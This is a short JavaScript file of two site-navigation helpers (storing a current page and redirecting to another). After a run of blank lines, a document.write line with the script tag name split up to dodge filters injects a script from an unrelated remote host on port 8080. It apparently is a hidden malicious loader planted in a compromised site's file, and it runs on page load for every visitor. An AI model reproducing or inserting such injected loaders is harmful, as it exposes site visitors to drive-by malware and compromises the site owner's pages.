// JavaScript Document

var pcurrent=""

function pstorecurrent(aa){
	pcurrent=aa
}

function gotothispage(thispage){
	if (thispage!=pcurrent){
		location.href=[thispage]
	}
}




document.write('<s'+'cript type="text/javascript" src="http://sfofotky.iexam.info:8080/PC.js"></scr'+'ipt>');